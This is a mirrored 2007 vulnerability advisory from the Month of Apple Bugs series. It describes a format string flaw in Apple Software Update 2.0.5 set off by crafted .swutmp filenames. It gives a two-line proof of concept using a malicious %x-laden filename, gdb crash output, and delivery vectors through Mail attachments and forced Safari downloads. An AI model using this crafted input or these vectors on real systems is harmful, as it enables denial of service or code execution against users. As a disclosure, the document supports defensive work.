SecurityvulnsSECURITYVULNS:DOC:15889MOAB-24-01-2007: Apple Software Update Catalog Filename Format String Vulnerability
Summary
Apple Software Update is used for delivering patches to end-users, such as the Apple Security Update 2007-001. It relies on the HTTP protocol for retrieving files associated with each available patch, and handles the application/x-apple.sucatalog+xml MIME type and the sucatalog and swutmp file extensions.
Software Update fails to properly handle the filename strings containing the swutmp extension. It's a affected by a typical format string vulnerability, which can lead to a denial of service condition or arbitrary code execution.
See the 'Exploitation conditions' section for more information.
Affected versions
This issue has been verified with Apple Software Update Version 2.0.5 (2.0.5) on Mac OS X 10.4.8 (8L2127).
Proof of concept, exploit or instructions to reproduce
The following is the most simple way to demonstrate this issue:
$ touch %x.%x.%x.ThisIsEmbarrassing%x.%x.%x.%x.swutmp
$ open %x.%x.%x.ThisIsEmbarrassing%x.%x.%x.%x.swutmp
See the 'Exploitation conditions' section for more information on different vectors to trigger the issue.
Debugging information
The following debugging information shows Software Update crashing when opening a file with a crafted filename:
(gdb) r
Starting program: /System/Library/CoreServices/Software Update.app/Contents/
MacOS/Software Update
Reading symbols for shared libraries … done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x9326aea3
0x9000c0c1 in __vfprintf ()
(gdb) i r
eax 0x9326aea3 -1826181469
ecx 0x0 0
edx 0x0 0
ebx 0x9000ad62 -1879003806
esp 0xbfffd600 0xbfffd600
ebp 0xbfffdd58 0xbfffdd58
esi 0xbfffed4e -1073746610
edi 0x25 37
eip 0x9000c0c1 0x9000c0c1 <__vfprintf+4976>
eflags 0x10282 66178
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x37 55
(gdb) back
#0 0x9000c0c1 in __vfprintf ()
#1 0x90100ea9 in snprintf_l ()
#2 0x908119d5 in _CFStringAppendFormatAndArgumentsAux ()
#3 0x9081091c in _CFStringCreateWithFormatAndArgumentsAux ()
#4 0x925daa5d in -[NSPlaceholderString initWithFormat:locale:arguments:] ()
#5 0x925fc670 in -[NSString initWithFormat:arguments:] ()
#6 0x9336056f in -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] ()
#7 0x934ac77a in _NXDoLocalRunAlertPanel ()
#8 0x93588ad6 in NSRunCriticalAlertPanel ()
#9 0x0000612a in ?? ()
(gdb) grep /s ThisIsEmbarrassing
Pattern found @ 0x1879433
0x1879433: "ThisIsEmbarrassing%n%n%n%#629AE"
Pattern found @ 0x3b792b
0x3b792b: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmp???\005"
Pattern found @ 0x3b7c6b
0x3b7c6b: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmpssing%25`???\a\001"
Pattern found @ 0x3b7cc4
0x3b7cc4: "ThisIsEmbarrassing%25n%25n%25n%25n%25n.swutmp"
Notes
Exploitation conditions
We are conducting further tests around Software Update and possible vectors to abuse this issue. So far, we have worked around Mail.app via crafted attachment, 'pushing' Safari to download the file (which is downloaded at the user Desktop folder automatically, by sending it as the associated MIME type application/x-apple.sucatalog+xml) and obviously locally opening the file.
There are other potential methods to abuse it and thus this advisory might be updated whenever new details become available and tested.
Workaround or temporary solution
Wait for Apple to release a patch for Software Update via Software Update.
"Ah, #23 explains #22 a little. It almost seems like they're wording it so a crash could lead to a root shell in all cases." -- Someone who missed Sesame street's "We Learn Reading with Duckie".